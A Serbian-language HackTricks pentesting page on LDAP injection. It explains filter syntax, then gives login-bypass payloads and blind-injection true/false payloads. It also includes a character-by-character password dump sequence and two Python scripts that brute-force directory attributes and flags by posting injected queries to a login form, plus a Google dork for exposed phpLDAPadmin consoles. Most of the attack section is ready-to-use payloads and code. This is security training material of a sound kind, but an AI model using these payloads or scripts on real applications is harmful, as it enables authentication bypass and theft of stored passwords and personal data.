9.2 KiB
LDAP Injection
LDAP Injection
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
If you are interested in hacking career and hack the unhackable - we are hiring! (tečno poznavanje poljskog jezika u pisanju i govoru je obavezno).
{% embed url="https://www.stmcyber.com/careers" %}
LDAP Injection
LDAP
Ako želite da saznate šta je LDAP, posetite sledeću stranicu:
{% content-ref url="../network-services-pentesting/pentesting-ldap.md" %} pentesting-ldap.md {% endcontent-ref %}
LDAP Injection je napad koji cilja web aplikacije koje konstruiraju LDAP izjave iz korisničkog unosa. Do njega dolazi kada aplikacija ne uspe da pravilno sanitizuje unos, omogućavajući napadačima da manipulišu LDAP izjavama putem lokalnog proksija, što može dovesti do neovlašćenog pristupa ili manipulacije podacima.
{% file src="../.gitbook/assets/EN-Blackhat-Europe-2008-LDAP-Injection-Blind-LDAP-Injection.pdf" %}
Filter = ( filtercomp )
Filtercomp = and / or / not / item
And = & filterlist
Or = |filterlist
Not = ! filter
Filterlist = 1*filter
Item= simple / present / substring
Simple = attr filtertype assertionvalue
Filtertype = '=' / '~=' / '>=' / '<='
Present = attr = *
Substring = attr ”=” [initial] * [final]
Initial = assertionvalue
Final = assertionvalue
(&) = Absolute TRUE
(|) = Absolute FALSE
Na primer:
(&(!(objectClass=Impresoras))(uid=s*))
(&(objectClass=user)(uid=*))
Možete pristupiti bazi podataka, a ona može sadržati informacije različitih tipova.
OpenLDAP: Ako stignu 2 filtera, izvršava samo prvi.
ADAM ili Microsoft LDS: Sa 2 filtera bacaju grešku.
SunOne Directory Server 5.0: Izvršava oba filtera.
Veoma je važno poslati filter sa ispravnom sintaksom ili će biti bačena greška. Bolje je poslati samo 1 filter.
Filter mora početi sa: &
ili |
Primer: (&(directory=val1)(folder=public))
(&(objectClass=VALUE1)(type=Epson*))
VALUE1 = *)(ObjectClass=*))(&(objectClass=void
Zatim: (&(objectClass=
*)(ObjectClass=*))
će biti prvi filter (onaj koji se izvršava).
Login Bypass
LDAP podržava nekoliko formata za čuvanje lozinke: clear, md5, smd5, sh1, sha, crypt. Dakle, može se desiti da bez obzira na to šta unesete u lozinku, ona bude hashovana.
user=*
password=*
--> (&(user=*)(password=*))
# The asterisks are great in LDAPi
user=*)(&
password=*)(&
--> (&(user=*)(&)(password=*)(&))
user=*)(|(&
pass=pwd)
--> (&(user=*)(|(&)(pass=pwd))
user=*)(|(password=*
password=test)
--> (&(user=*)(|(password=*)(password=test))
user=*))%00
pass=any
--> (&(user=*))%00 --> Nothing more is executed
user=admin)(&)
password=pwd
--> (&(user=admin)(&))(password=pwd) #Can through an error
username = admin)(!(&(|
pass = any))
--> (&(uid= admin)(!(& (|) (webpassword=any)))) —> As (|) is FALSE then the user is admin and the password check is True.
username=*
password=*)(&
--> (&(user=*)(password=*)(&))
username=admin))(|(|
password=any
--> (&(uid=admin)) (| (|) (webpassword=any))
Liste
Slepa LDAP Injekcija
Možete naterati False ili True odgovore da proverite da li se vraćaju podaci i potvrdite moguću Slepu LDAP Injekciju:
#This will result on True, so some information will be shown
Payload: *)(objectClass=*))(&objectClass=void
Final query: (&(objectClass= *)(objectClass=*))(&objectClass=void )(type=Pepi*))
#This will result on True, so no information will be returned or shown
Payload: void)(objectClass=void))(&objectClass=void
Final query: (&(objectClass= void)(objectClass=void))(&objectClass=void )(type=Pepi*))
Dump data
Možete iterirati preko ascii slova, cifara i simbola:
(&(sn=administrator)(password=*)) : OK
(&(sn=administrator)(password=A*)) : KO
(&(sn=administrator)(password=B*)) : KO
...
(&(sn=administrator)(password=M*)) : OK
(&(sn=administrator)(password=MA*)) : KO
(&(sn=administrator)(password=MB*)) : KO
...
Scripts
Otkrivanje validnih LDAP polja
LDAP objekti po defaultu sadrže nekoliko atributa koji se mogu koristiti za čuvanje informacija. Možete pokušati da brute-force-ujete sve njih kako biste izvukli te informacije. Možete pronaći listu default LDAP atributa ovde.
#!/usr/bin/python3
import requests
import string
from time import sleep
import sys
proxy = { "http": "localhost:8080" }
url = "http://10.10.10.10/login.php"
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
attributes = ["c", "cn", "co", "commonName", "dc", "facsimileTelephoneNumber", "givenName", "gn", "homePhone", "id", "jpegPhoto", "l", "mail", "mobile", "name", "o", "objectClass", "ou", "owner", "pager", "password", "sn", "st", "surname", "uid", "username", "userPassword",]
for attribute in attributes: #Extract all attributes
value = ""
finish = False
while not finish:
for char in alphabet: #In each possition test each possible printable char
query = f"*)({attribute}={value}{char}*"
data = {'login':query, 'password':'bla'}
r = requests.post(url, data=data, proxies=proxy)
sys.stdout.write(f"\r{attribute}: {value}{char}")
#sleep(0.5) #Avoid brute-force bans
if "Cannot login" in r.text:
value += str(char)
break
if char == alphabet[-1]: #If last of all the chars, then, no more chars in the value
finish = True
print()
Specijalna Slepa LDAP Injekcija (bez "*")
#!/usr/bin/python3
import requests, string
alphabet = string.ascii_letters + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(50):
print("[i] Looking for number " + str(i))
for char in alphabet:
r = requests.get("http://ctf.web??action=dir&search=admin*)(password=" + flag + char)
if ("TRUE CONDITION" in r.text):
flag += char
print("[+] Flag: " + flag)
break
Google Dorks
intitle:"phpLDAPadmin" inurl:cmd.php
Više Payload-a
{% embed url="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection" %}
Ako ste zainteresovani za karijeru u hakovanju i da hakujete ono što se ne može hakovati - zapošljavamo! (potrebno je tečno pisanje i govorenje poljskog).
{% embed url="https://www.stmcyber.com/careers" %}
{% hint style="success" %}
Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Podržite HackTricks
- Proverite planove pretplate!
- Pridružite se 💬 Discord grupi ili telegram grupi ili pratite nas na Twitter-u 🐦 @hacktricks_live.
- Podelite trikove za hakovanje slanjem PR-ova na HackTricks i HackTricks Cloud github repozitorijume.